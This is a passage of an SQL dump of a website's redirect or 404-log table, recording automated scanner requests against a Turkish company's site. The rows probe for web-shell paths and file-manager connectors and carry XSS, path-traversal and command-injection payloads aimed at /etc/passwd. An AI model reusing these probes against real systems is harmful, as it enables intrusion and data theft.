00:00:00',301),(28930,'http://3s-technologies.com.tr/tr/assets/plugins/fileuploader/examples/one-button/php/form_upload.php',NULL,'','',2,0,'2022-04-11 02:34:21','0000-00-00 00:00:00',301),(28931,'http://3s-technologies.com.tr/en/fw.php',NULL,'www.google.com','',27,0,'2022-04-11 15:58:33','0000-00-00 00:00:00',301),(28932,'https://3s-technologies.com.tr/en/fw.php',NULL,'www.google.com','',14,0,'2022-04-11 15:58:45','0000-00-00 00:00:00',301),(28933,'http://3s-technologies.com.tr/en/ffaa531.php',NULL,'www.google.com','',1,0,'2022-04-11 15:58:57','0000-00-00 00:00:00',301),(28934,'https://3s-technologies.com.tr/en/ffaa531.php',NULL,'www.google.com','',1,0,'2022-04-11 15:59:09','0000-00-00 00:00:00',301),(28935,'http://3s-technologies.com.tr/en/local.php',NULL,'www.google.com','',13,0,'2022-04-11 15:59:21','0000-00-00 00:00:00',301),(28936,'https://3s-technologies.com.tr/en/local.php',NULL,'www.google.com','',12,0,'2022-04-11 15:59:37','0000-00-00 00:00:00',301),(28937,'http://3s-technologies.com.tr/en/xleet-shell.php',NULL,'www.google.com','',16,0,'2022-04-11 15:59:54','0000-00-00 00:00:00',301),(28938,'https://3s-technologies.com.tr/en/xleet-shell.php',NULL,'www.google.com','',14,0,'2022-04-11 16:00:11','0000-00-00 00:00:00',301),(28939,'http://3s-technologies.com.tr/en/wp-2019.php',NULL,'www.google.com','',22,0,'2022-04-11 16:00:30','0000-00-00 00:00:00',301),(28940,'https://3s-technologies.com.tr/en/wp-2019.php',NULL,'www.google.com','',12,0,'2022-04-11 16:00:49','0000-00-00 00:00:00',301),(28941,'http://3s-technologies.com.tr/en/991176.php',NULL,'www.google.com','',1,0,'2022-04-11 16:01:07','0000-00-00 00:00:00',301),(28942,'https://3s-technologies.com.tr/en/991176.php',NULL,'www.google.com','',1,0,'2022-04-11 16:01:27','0000-00-00 00:00:00',301),(28943,'http://3s-technologies.com.tr/en/shell20211028.php',NULL,'www.google.com','',19,0,'2022-04-11 16:01:45','0000-00-00 00:00:00',301),(28944,'https://3s-technologies.com.tr/en/shell20211028.php',NULL,'www.google.com','',15,0,'2022-04-11 16:02:05','0000-00-00 00:00:00',301),(28945,'http://3s-technologies.com.tr/en/autoload_classmap.php',NULL,'www.google.com','',54,0,'2022-04-11 16:03:18','0000-00-00 00:00:00',301),(28946,'https://3s-technologies.com.tr/en/autoload_classmap.php',NULL,'www.google.com','',13,0,'2022-04-11 16:03:37','0000-00-00 00:00:00',301),(28947,'http://3s-technologies.com.tr/en/anon.php',NULL,'www.google.com','',14,0,'2022-04-11 16:03:56','0000-00-00 00:00:00',301),(28948,'https://3s-technologies.com.tr/en/anon.php',NULL,'www.google.com','',12,0,'2022-04-11 16:04:12','0000-00-00 00:00:00',301),(28949,'http://3s-technologies.com.tr/en/gank.php.php',NULL,'www.google.com','',18,0,'2022-04-11 16:04:27','0000-00-00 00:00:00',301),(28950,'https://3s-technologies.com.tr/en/gank.php.php',NULL,'www.google.com','',3,0,'2022-04-11 16:04:41','0000-00-00 00:00:00',301),(28951,'http://3s-technologies.com.tr/en/defaul1.php',NULL,'www.google.com','',11,0,'2022-04-11 16:04:56','0000-00-00 00:00:00',301),(28952,'https://3s-technologies.com.tr/en/defaul1.php',NULL,'www.google.com','',9,0,'2022-04-11 16:05:11','0000-00-00 00:00:00',301),(28953,'https://3s-technologies.com.tr/en/ups.php',NULL,'www.google.com','',14,0,'2022-04-11 16:05:31','0000-00-00 00:00:00',301),(28954,'https://3s-technologies.com.tr/en/xleet.php',NULL,'www.google.com','',13,0,'2022-04-11 16:05:51','0000-00-00 00:00:00',301),(28955,'http://3s-technologies.com.tr/en/403.php',NULL,'www.google.com','',63,0,'2022-04-11 16:06:01','0000-00-00 00:00:00',301),(28956,'https://3s-technologies.com.tr/en/403.php',NULL,'www.google.com','',14,0,'2022-04-11 16:06:13','0000-00-00 00:00:00',301),(28957,'http://3s-technologies.com.tr/en/wp-content/plugins/ubh/up.php/.well-known',NULL,'www.google.com','',1,0,'2022-04-11 16:06:27','0000-00-00 00:00:00',301),(28958,'https://3s-technologies.com.tr/en/wp-content/plugins/ubh/up.php/.well-known',NULL,'www.google.com','',1,0,'2022-04-11 16:06:42','0000-00-00 00:00:00',301),(28959,'http://3s-technologies.com.tr/en/wp-content/uploads',NULL,'www.google.com','',177,0,'2022-04-11 16:07:21','0000-00-00 00:00:00',301),(28960,'http://3s-technologies.com.tr/en/s_ne.php',NULL,'www.bing.com','',15,0,'2022-04-11 18:55:42','0000-00-00 00:00:00',301),(28961,'http://3s-technologies.com.tr/en/doc.php',NULL,'www.bing.com','',43,0,'2022-04-11 18:55:44','0000-00-00 00:00:00',301),(28962,'http://3s-technologies.com.tr/en/wp_wrong_datlib.php',NULL,'www.bing.com','',27,0,'2022-04-11 18:56:52','0000-00-00 00:00:00',301),(28963,'http://3s-technologies.com.tr/en/beence.php',NULL,'www.bing.com','',15,0,'2022-04-11 18:56:52','0000-00-00 00:00:00',301),(28964,'http://3s-technologies.com.tr/en/wp-signin.php?dizo&ping',NULL,'www.bing.com','',12,0,'2022-04-11 18:56:53','0000-00-00 00:00:00',301),(28965,'http://3s-technologies.com.tr/en/media-admin.php',NULL,'www.bing.com','',16,0,'2022-04-11 18:56:56','0000-00-00 00:00:00',301),(28966,'http://3s-technologies.com.tr/en/export.php',NULL,'www.bing.com','',15,0,'2022-04-11 18:57:00','0000-00-00 00:00:00',301),(28967,'http://3s-technologies.com.tr/en/wp-content/export.php',NULL,'www.bing.com','',14,0,'2022-04-11 18:57:00','0000-00-00 00:00:00',301),(28968,'http://3s-technologies.com.tr/en/wp-includes/wp-class.php',NULL,'www.bing.com','',36,0,'2022-04-11 18:57:01','0000-00-00 00:00:00',301),(28969,'http://3s-technologies.com.tr/en/wp-includes/images/css.php',NULL,'www.bing.com','',15,0,'2022-04-11 18:57:03','0000-00-00 00:00:00',301),(28970,'http://3s-technologies.com.tr/en/defau1t.php',NULL,'www.bing.com','',26,0,'2022-04-11 18:57:04','0000-00-00 00:00:00',301),(28971,'http://3s-technologies.com.tr/en/wp-includes/css/wp-config.php',NULL,'www.bing.com','',15,0,'2022-04-11 18:57:07','0000-00-00 00:00:00',301),(28972,'http://3s-technologies.com.tr/en/wp-plugins.php',NULL,'www.bing.com','',25,0,'2022-04-11 18:57:13','0000-00-00 00:00:00',301),(28973,'http://3s-technologies.com.tr/en/wp-content/db-cache.php',NULL,'www.bing.com','',15,0,'2022-04-11 18:57:14','0000-00-00 00:00:00',301),(28974,'http://3s-technologies.com.tr/en/archives.php',NULL,'www.bing.com','',14,0,'2022-04-11 18:57:15','0000-00-00 00:00:00',301),(28975,'http://3s-technologies.com.tr/en/defau11.php',NULL,'www.bing.com','',12,0,'2022-04-11 18:57:17','0000-00-00 00:00:00',301),(28976,'http://3s-technologies.com.tr/en/wp-content/outcms.php?up',NULL,'www.bing.com','',12,0,'2022-04-11 18:57:18','0000-00-00 00:00:00',301),(28977,'http://3s-technologies.com.tr/en/system_log.php?bala=up',NULL,'www.bing.com','',9,0,'2022-04-11 18:57:18','0000-00-00 00:00:00',301),(28978,'http://3s-technologies.com.tr/en/wp-backup-sql-302.php',NULL,'www.bing.com','',14,0,'2022-04-11 18:57:19','0000-00-00 00:00:00',301),(28979,'http://3s-technologies.com.tr/en/error.php?phpshells',NULL,'www.bing.com','',13,0,'2022-04-11 18:57:20','0000-00-00 00:00:00',301),(28980,'http://3s-technologies.com.tr/en/alfa_data',NULL,'www.bing.com','',32,0,'2022-04-11 18:57:20','0000-00-00 00:00:00',301),(28981,'http://3s-technologies.com.tr/en/alfacgiapi',NULL,'www.bing.com','',14,0,'2022-04-11 18:57:21','0000-00-00 00:00:00',301),(28982,'http://3s-technologies.com.tr/en/cgialfa',NULL,'www.bing.com','',12,0,'2022-04-11 18:57:22','0000-00-00 00:00:00',301),(28983,'http://3s-technologies.com.tr/en/.well-known/alfa_data',NULL,'www.bing.com','',12,0,'2022-04-11 18:57:23','0000-00-00 00:00:00',301),(28984,'http://3s-technologies.com.tr/en/.well-known/alfacgiapi',NULL,'www.bing.com','',12,0,'2022-04-11 18:57:29','0000-00-00 00:00:00',301),(28985,'http://3s-technologies.com.tr/en/.well-known/cgialfa',NULL,'www.bing.com','',12,0,'2022-04-11 18:57:30','0000-00-00 00:00:00',301),(28986,'http://3s-technologies.com.tr/en/wp-content/uploads/alfa_data',NULL,'www.bing.com','',12,0,'2022-04-11 18:57:31','0000-00-00 00:00:00',301),(28987,'http://3s-technologies.com.tr/en/wp-content/uploads/alfacgiapi',NULL,'www.bing.com','',12,0,'2022-04-11 18:57:31','0000-00-00 00:00:00',301),(28988,'http://3s-technologies.com.tr/en/wp-content/uploads/cgialfa',NULL,'www.bing.com','',12,0,'2022-04-11 18:57:32','0000-00-00 00:00:00',301),(28989,'http://3s-technologies.com.tr/en/wp-includes/alfa_data',NULL,'www.bing.com','',11,0,'2022-04-11 18:57:32','0000-00-00 00:00:00',301),(28990,'http://3s-technologies.com.tr/en/wp-includes/alfacgiapi',NULL,'www.bing.com','',12,0,'2022-04-11 18:57:33','0000-00-00 00:00:00',301),(28991,'http://3s-technologies.com.tr/en/wp-includes/cgialfa',NULL,'www.bing.com','',11,0,'2022-04-11 18:57:34','0000-00-00 00:00:00',301),(28992,'http://3s-technologies.com.tr/en/wp-admin/alfa_data',NULL,'www.bing.com','',11,0,'2022-04-11 18:57:35','0000-00-00 00:00:00',301),(28993,'http://3s-technologies.com.tr/en/wp-admin/alfacgiapi',NULL,'www.bing.com','',11,0,'2022-04-11 18:57:35','0000-00-00 00:00:00',301),(28994,'http://3s-technologies.com.tr/en/wp-admin/cgialfa',NULL,'www.bing.com','',11,0,'2022-04-11 18:57:36','0000-00-00 00:00:00',301),(28995,'http://3s-technologies.com.tr/en/wp-content/alfa_data',NULL,'www.bing.com','',11,0,'2022-04-11 18:57:36','0000-00-00 00:00:00',301),(28996,'http://3s-technologies.com.tr/en/wp-content/alfacgiapi',NULL,'www.bing.com','',11,0,'2022-04-11 18:57:37','0000-00-00 00:00:00',301),(28997,'http://3s-technologies.com.tr/en/wp-content/cgialfa',NULL,'www.bing.com','',11,0,'2022-04-11 18:57:37','0000-00-00 00:00:00',301),(28998,'http://3s-technologies.com.tr/en/templates/beez3/alfa_data',NULL,'www.bing.com','',11,0,'2022-04-11 18:57:38','0000-00-00 00:00:00',301),(28999,'http://3s-technologies.com.tr/en/templates/beez3/alfacgiapi',NULL,'www.bing.com','',11,0,'2022-04-11 18:57:39','0000-00-00 00:00:00',301),(29000,'http://3s-technologies.com.tr/en/templates/beez3/cgialfa',NULL,'www.bing.com','',11,0,'2022-04-11 18:57:39','0000-00-00 00:00:00',301),(29001,'http://3s-technologies.com.tr/en/sites/default/files/alfa_data',NULL,'www.bing.com','',11,0,'2022-04-11 18:57:40','0000-00-00 00:00:00',301),(29002,'http://3s-technologies.com.tr/en/sites/default/files/alfacgiapi',NULL,'www.bing.com','',10,0,'2022-04-11 18:58:48','0000-00-00 00:00:00',301),(29003,'http://3s-technologies.com.tr/en/sites/default/files/cgialfa',NULL,'www.bing.com','',11,0,'2022-04-11 18:58:49','0000-00-00 00:00:00',301),(29004,'http://3s-technologies.com.tr/en/admin/controller/extension/extension/alfa_data',NULL,'www.bing.com','',11,0,'2022-04-11 18:58:50','0000-00-00 00:00:00',301),(29005,'http://3s-technologies.com.tr/en/admin/controller/extension/extension/alfacgiapi',NULL,'www.bing.com','',11,0,'2022-04-11 18:58:51','0000-00-00 00:00:00',301),(29006,'http://3s-technologies.com.tr/en/admin/controller/extension/extension/cgialfa',NULL,'www.bing.com','',11,0,'2022-04-11 18:58:52','0000-00-00 00:00:00',301),(29007,'http://3s-technologies.com.tr/tr/assets/plugins/elfinder/connectors/php/connector.php',NULL,'','',5,0,'2022-04-12 09:43:50','0000-00-00 00:00:00',301),(29008,'https://3s-technologies.com.tr/tr/iletisim/media/mod_languages/images/tr.gif',NULL,'','',1,0,'2022-04-13 14:27:10','0000-00-00 00:00:00',301),(29009,'https://3s-technologies.com.tr/tr/backup/license.txt',NULL,'https://3s-technologies.com.tr/backup/license.txt','',2,0,'2022-04-13 20:27:12','0000-00-00 00:00:00',301),(29010,'http://3s-technologies.com.tr/tr/assets/js/elfinder/connectors/php/connector.php',NULL,'','',1,0,'2022-04-13 22:58:30','0000-00-00 00:00:00',301),(29011,'http://3s-technologies.com.tr/tr/public/plugins/elfinder/connectors/php/connector.php',NULL,'','',7,0,'2022-04-14 08:36:19','0000-00-00 00:00:00',301),(29012,'http://3s-technologies.com.tr/tr/wp-content/plugins/woo-product-table/readme.txt',NULL,'http://3s-technologies.com.tr/wp-content/plugins/woo-product-table/readme.txt','',1,0,'2022-04-15 10:58:53','0000-00-00 00:00:00',301),(29013,'https://3s-technologies.com.tr/tr/iletisim/media/mod_languages/images/en.gif',NULL,'','',1,0,'2022-04-15 19:50:11','0000-00-00 00:00:00',301),(29014,'http://3s-technologies.com.tr/tr/assets/elfinder/src/connectors/php/connector.php',NULL,'','',1,0,'2022-04-16 02:44:11','0000-00-00 00:00:00',301),(29015,'http://3s-technologies.com.tr/tr/assets/plugins/elfinder/src/connectors/php/connector.php',NULL,'','',2,0,'2022-04-16 11:19:03','0000-00-00 00:00:00',301),(29016,'http://3s-technologies.com.tr/tr/admin/elfinder/src/connectors/php/connector.php',NULL,'','',5,0,'2022-04-18 08:04:57','0000-00-00 00:00:00',301),(29017,'http://3s-technologies.com.tr/images.php',NULL,'','',1,0,'2022-04-18 12:03:31','0000-00-00 00:00:00',301),(29018,'http://3s-technologies.com.tr/tr/plugins/elfinder/connectors/php/connector.php',NULL,'','',5,0,'2022-04-20 10:51:59','0000-00-00 00:00:00',301),(29019,'http://3s-technologies.com.tr/en/m6u68/xmlrpc.php',NULL,'http://3s-technologies.com.tr/m6u68/xmlrpc.php','',2,0,'2022-04-20 21:32:51','0000-00-00 00:00:00',301),(29020,'http://3s-technologies.com.tr/tr/assets/admin/plugins/elfinder/connectors/php/connector.php',NULL,'','',5,0,'2022-04-21 19:02:55','0000-00-00 00:00:00',301),(29021,'https://3s-technologies.com.tr/en/pcb-productions-methods/media/mod_languages/images/en.gif',NULL,'','',1,0,'2022-04-23 09:11:59','0000-00-00 00:00:00',301),(29022,'https://3s-technologies.com.tr/tr?format=\"><img+src=x+onerror=alert(1);>&type=\"><img+src=x+onerror=alert(1);>/cgi-bin/kerbynet?action=startsessionsubmit&user=\'\ncat /etc/passwd\n\'&pw=',NULL,'','',1,0,'2022-04-23 10:29:08','0000-00-00 00:00:00',301),(29023,'https://3s-technologies.com.tr/tr?format=\"><img+src=x+onerror=alert(1);>&type=\"><img+src=x+onerror=alert(1);>//example.com',NULL,'','',2,0,'2022-04-23 10:29:10','0000-00-00 00:00:00',301),(29024,'https://3s-technologies.com.tr/tr?format=\"><img+src=x+onerror=alert(1);>&type=\"><img+src=x+onerror=alert(1);>/ftb.imagegallery.aspx',NULL,'','',1,0,'2022-04-23 10:29:10','0000-00-00 00:00:00',301),(29025,'https://3s-technologies.com.tr/tr?format=\"><img+src=x+onerror=alert(1);>&type=\"><img+src=x+onerror=alert(1);>/login.php',NULL,'','',1,0,'2022-04-23 10:29:18','0000-00-00 00:00:00',301),(29026,'https://3s-technologies.com.tr/tr?format=\"><img+src=x+onerror=alert(1);>&type=\"><img+src=x+onerror=alert(1);>/login',NULL,'','',2,0,'2022-04-23 10:29:18','0000-00-00 00:00:00',301),(29027,'https://3s-technologies.com.tr/tr?format=\"><img+src=x+onerror=alert(1);>&type=\"><img+src=x+onerror=alert(1);>/glpi/plugins/barcode/front/send.php?file=../../../../../../../../etc/passwd',NULL,'','',1,0,'2022-04-23 10:29:18','0000-00-00 00:00:00',301),(29028,'https://3s-technologies.com.tr/tr?format=\"><img+src=x+onerror=alert(1);>&type=\"><img+src=x+onerror=alert(1);>/appliance/login.ns?login[password]=test\"><svg/onload=alert(document.domain)>&login[use_curr]=1&login[submit]=change password',NULL,'','',1,0,'2022-04-23 10:29:21','0000-00-00 00:00:00',301),(29029,'https://3s-technologies.com.tr/tr/ui/api/v1/global-search/builds?jfloader=true',NULL,'','',1,0,'2022-04-23 10:29:28','0000-00-00 00:00:00',301),(29030,'https://3s-technologies.com.tr/tr/cu.html',NULL,'','',1,0,'2022-04-23 10:29:28','0000-00-00 00:00:00',301),(29031,'https://3s-technologies.com.tr/tr/wp-admin/admin.php?page=cf7skins&tab=\'><img+src+onerror=alert(document.domain)>',NULL,'','',1,0,'2022-04-23 10:29:33','0000-00-00 00:00:00',301),(29032,'https://3s-technologies.com.tr/tr?format=\"><img+src=x+onerror=alert(1);>&type=\"><img+src=x+onerror=alert(1);>/healthz',NULL,'','',1,0,'2022-04-23 10:29:41','0000-00-00 00:00:00',301),(29033,'https://3s-technologies.com.tr/tr?format=\"><img+src=x+onerror=alert(1);>&type=\"><img+src=x+onerror=alert(1);>/../../../../../../../../../../../../windows/win.ini',NULL,'','',1,0,'2022-04-23 10:29:41','0000-00-00 00:00:00',301),(29034,'https://3s-technologies.com.tr/tr?format=\"><img+src=x+onerror=alert(1);>&type=\"><img+src=x+onerror=alert(1);>/lan.html',NULL,'','',1,0,'2022-04-23 10:30:29','0000-00-00 00:00:00',301),(29035,'https://3s-technologies.com.tr/tr?format=\"><img+src=x+onerror=alert(1);>&type=\"><img+src=x+onerror=alert(1);>/nbproject/project.properties',NULL,'','',1,0,'2022-04-23 10:30:51','0000-00-00 00:00:00',301),(29036,'https://3s-technologies.com.tr/tr?format=\"><img+src=x+onerror=alert(1);>&type=\"><img+src=x+onerror=alert(1);>/api/v1/status/config',NULL,'','',1,0,'2022-04-23 10:30:51','0000-00-00 00:00:00',301),(29037,'https://3s-technologies.com.tr/tr?format=\"><img+src=x+onerror=alert(1);>&type=\"><img+src=x+onerror=alert(1);>/apimanui/api-manager',NULL,'','',1,0,'2022-04-23 10:30:53','0000-00-00 00:00:00',301),(29038,'https://3s-technologies.com.tr/tr?format=\"><img+src=x+onerror=alert(1);>&type=\"><img+src=x+onerror=alert(1);>/index.php?option=com_multimap&controller=../../../../../../../../../../etc/passwd\0',NULL,'','',1,0,'2022-04-23 10:30:57','0000-00-00 00:00:00',301),(29039,'https://3s-technologies.com.tr/tr?format=\"><img+src=x+onerror=alert(1);>&type=\"><img+src=x+onerror=alert(1);>/wp-content/uploads/affwp-debug.log',NULL,'','',1,0,'2022-04-23 10:30:59','0000-00-00 00:00:00',301),(29040,'https://3s-technologies.com.tr/tr?format=\"><img+src=x+onerror=alert(1);>&type=\"><img+src=x+onerror=alert(1);>/kenesto/account/logon?returnurl=/kenesto',NULL,'','',1,0,'2022-04-23 10:30:59','0000-00-00 00:00:00',301),(29041,'https://3s-technologies.com.tr/tr?format=\"><img+src=x+onerror=alert(1);>&type=\"><img+src=x+onerror=alert(1);>/lucee/admin/server.cfm',NULL,'','',1,0,'2022-04-23 10:31:39','0000-00-00 00:00:00',301),(29042,'https://3s-technologies.com.tr/tr/?format=\"><img+src=x+onerror=alert(1);>&type=\"><img+src=x+onerror=alert(1);>',NULL,'','',7,0,'2022-04-23 10:31:46','0000-00-00 00:00:00',301),(29043,'https://3s-technologies.com.tr/tr?format=\"><img+src=x+onerror=alert(1);>&type=\"><img+src=x+onerror=alert(1);>/actuator/mappings',NULL,'','',1,0,'2022-04-23 10:47:18','0000-00-00 00:00:00',301),(29044,'http://3s-technologies.com.tr/tr/admin/elfinder/connectors/php/connector.php',NULL,'','',5,0,'2022-04-23 11:19:38','0000-00-00 00:00:00',301),(29045,'https://3s-technologies.com.tr/tr?format=\"><img+src=x+onerror=alert(1);>&type=\"><img+src=x+onerror=alert(1);>/radiusmanager/user.php',NULL,'','',1,0,'2022-04-23 12:36:32','0000-00-00 00:00:00',301),(29046,'https://3s-technologies.com.tr/tr?format=\"><img+src=x+onerror=alert(1);>&type=\"><img+src=x+onerror=alert(1);>/user.php',NULL,'','',1,0,'2022-04-23 12:36:33','0000-00-00 00:00:00',301),(29047,'https://3s-technologies.com.tr/tr/hue/accounts/login?next=/',NULL,'','',5,0,'2022-04-23 13:37:18','0000-00-00 00:00:00',301),(29048,'https://3s-technologies.com.tr/tr/hue/accounts/login',NULL,'','',4,0,'2022-04-23 13:37:39','0000-00-00 00:00:00',301),(29049,'https://3s-technologies.com.tr/tr?format=\"><img+src=x+onerror=alert(1);>&type=\"><img+src=x+onerror=alert(1);>/bin/querybuilder.json',NULL,'','',1,0,'2022-04-23 13:53:15','0000-00-00 00:00:00',301),(29050,'https://3s-technologies.com.tr/tr?format=\"><img+src=x+onerror=alert(1);>&type=\"><img+src=x+onerror=alert(1);>/bin/querybuilder.json.servlet',NULL,'','',1,0,'2022-04-23 13:53:38','0000-00-00 00:00:00',301),(29051,'https://3s-technologies.com.tr/tr?format=\"><img+src=x+onerror=alert(1);>&type=\"><img+src=x+onerror=alert(1);>///bin///querybuilder.json',NULL,'','',1,0,'2022-04-23 13:53:47','0000-00-00 00:00:00',301),(29052,'https://3s-technologies.com.tr/tr?format=\"><img+src=x+onerror=alert(1);>&type=\"><img+src=x+onerror=alert(1);>///bin///querybuilder.json.servlet',NULL,'','',1,0,'2022-04-23 13:53:52','0000-00-00 00:00:00',301),(29053,'https://3s-technologies.com.tr/tr?format=\"><img+src=x+onerror=alert(1);>&type=\"><img+src=x+onerror=alert(1);>/bin/querybuilder.feed',NULL,'','',1,0,'2022-04-23 13:54:04','0000-00-00 00:00:00',301),(29054,'https://3s-technologies.com.tr/tr?format=\"><img+src=x+onerror=alert(1);>&type=\"><img+src=x+onerror=alert(1);>/bin/querybuilder.feed.servlet',NULL,'','',1,0,'2022-04-23 13:54:13','0000-00-00 00:00:00',301),(29055,'https://3s-technologies.com.tr/tr?format=\"><img+src=x+onerror=alert(1);>&type=\"><img+src=x+onerror=alert(1);>///bin///querybuilder.feed',NULL,'','',1,0,'2022-04-23 13:54:22','0000-00-00 00:00:00',301),(29056,'https://3s-technologies.com.tr/tr?format=\"><img+src=x+onerror=alert(1);>&type=\"><img+src=x+onerror=alert(1);>/service/',NULL,'','',1,0,'2022-04-23 15:38:29','0000-00-00 00:00:00',301),(29057,'https://3s-technologies.com.tr/tr?format=\"><img+src=x+onerror=alert(1);>&type=\"><img+src=x+onerror=alert(1);>/fw.login.php',NULL,'','',1,0,'2022-04-23 15:38:35','0000-00-00 00:00:00',301),(29058,'https://3s-technologies.com.tr/tr?format=\"><img+src=x+onerror=alert(1);>&type=\"><img+src=x+onerror=alert(1);>/wp-content/plugins/jh-404-logger/readme.txt',NULL,'','',1,0,'2022-04-23 15:38:40','0000-00-00 00:00:00',301),(29059,'https://3s-technologies.com.tr/tr?format=\"><img+src=x+onerror=alert(1);>&type=\"><img+src=x+onerror=alert(1);>/typo3/',NULL,'','',1,0,'2022-04-23 15:38:41','0000-00-00 00:00:00',301),(29060,'https://3s-technologies.com.tr/tr?format=\"><img+src=x+onerror=alert(1);>&type=\"><img+src=x+onerror=alert(1);>/zdm/login_xdm_uc.jsp',NULL,'','',1,0,'2022-04-23 15:38:51','0000-00-00 00:00:00',301),(29061,'https://3s-technologies.com.tr/tr/api/login',NULL,'https://3s-technologies.com.tr/manage/account/login?redirect=%2Fmanage','',1,0,'2022-04-23 15:39:26','0000-00-00 00:00:00',301),(29062,'https://3s-technologies.com.tr/tr/wp-admin/index.php',NULL,'','',2,0,'2022-04-23 15:39:33','0000-00-00 00:00:00',301),(29063,'https://3s-technologies.com.tr/tr?format=\"><img+src=x+onerror=alert(1);>&type=\"><img+src=x+onerror=alert(1);>/iam/login',NULL,'','',1,0,'2022-04-23 15:40:26','0000-00-00 00:00:00',301),(29064,'https://3s-technologies.com.tr/tr?format=\"><img+src=x+onerror=alert(1);>&type=\"><img+src=x+onerror=alert(1);>/?unix:aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa',NULL,'','',1,0,'2022-04-23 15:40:56','0000-00-00 00:00:00',301),(29065,'https://3s-technologies.com.tr/tr/qh.aspx?responderid=resourcenewresponder&action=download&filename=./qh.aspx',NULL,'','',1,0,'2022-04-23 15:42:26','0000-00-00 00:00:00',301),(29066,'https://3s-technologies.com.tr/tr?format=\"><img+src=x+onerror=alert(1);>&type=\"><img+src=x+onerror=alert(1);>/adm_program/system/redirect.php?url=javascript://%0aalert(document.domain)',NULL,'','',1,0,'2022-04-23 15:42:27','0000-00-00 00:00:00',301),(29067,'https://3s-technologies.com.tr/tr?format=\"><img+src=x+onerror=alert(1);>&type=\"><img+src=x+onerror=alert(1);>/api/v4/projects',NULL,'','',1,0,'2022-04-23 15:42:33','0000-00-00 00:00:00',301),(29068,'https://3s-technologies.com.tr/tr?format=\"><img+src=x+onerror=alert(1);>&type=\"><img+src=x+onerror=alert(1);>/general/login.php',NULL,'','',1,0,'2022-04-23 15:42:40','0000-00-00 00:00:00',301),(29069,'https://3s-technologies.com.tr/tr?format=\"><img+src=x+onerror=alert(1);>&type=\"><img+src=x+onerror=alert(1);>/perl-status',NULL,'','',1,0,'2022-04-23 15:42:46','0000-00-00 00:00:00',301),(29070,'https://3s-technologies.com.tr/tr?format=\"><img+src=x+onerror=alert(1);>&type=\"><img+src=x+onerror=alert(1);>/../../../../../../../../../../../../etc/passwd',NULL,'','',1,0,'2022-04-23 15:43:03','0000-00-00 00:00:00',301),(29071,'https://3s-technologies.com.tr/tr?format=\"><img+src=x+onerror=alert(1);>&type=\"><img+src=x+onerror=alert(1);>/pages/',NULL,'','',1,0,'2022-04-23 15:46:27','0000-00-00 00:00:00',301),(29072,'https://3s-technologies.com.tr/tr?format=\"><img+src=x+onerror=alert(1);>&type=\"><img+src=x+onerror=alert(1);>/my-account/?alg_wc_ev_verify_email=eyjpzci6mswiy29kzsi6mh0=',NULL,'','',1,0,'2022-04-23 15:46:47','0000-00-00 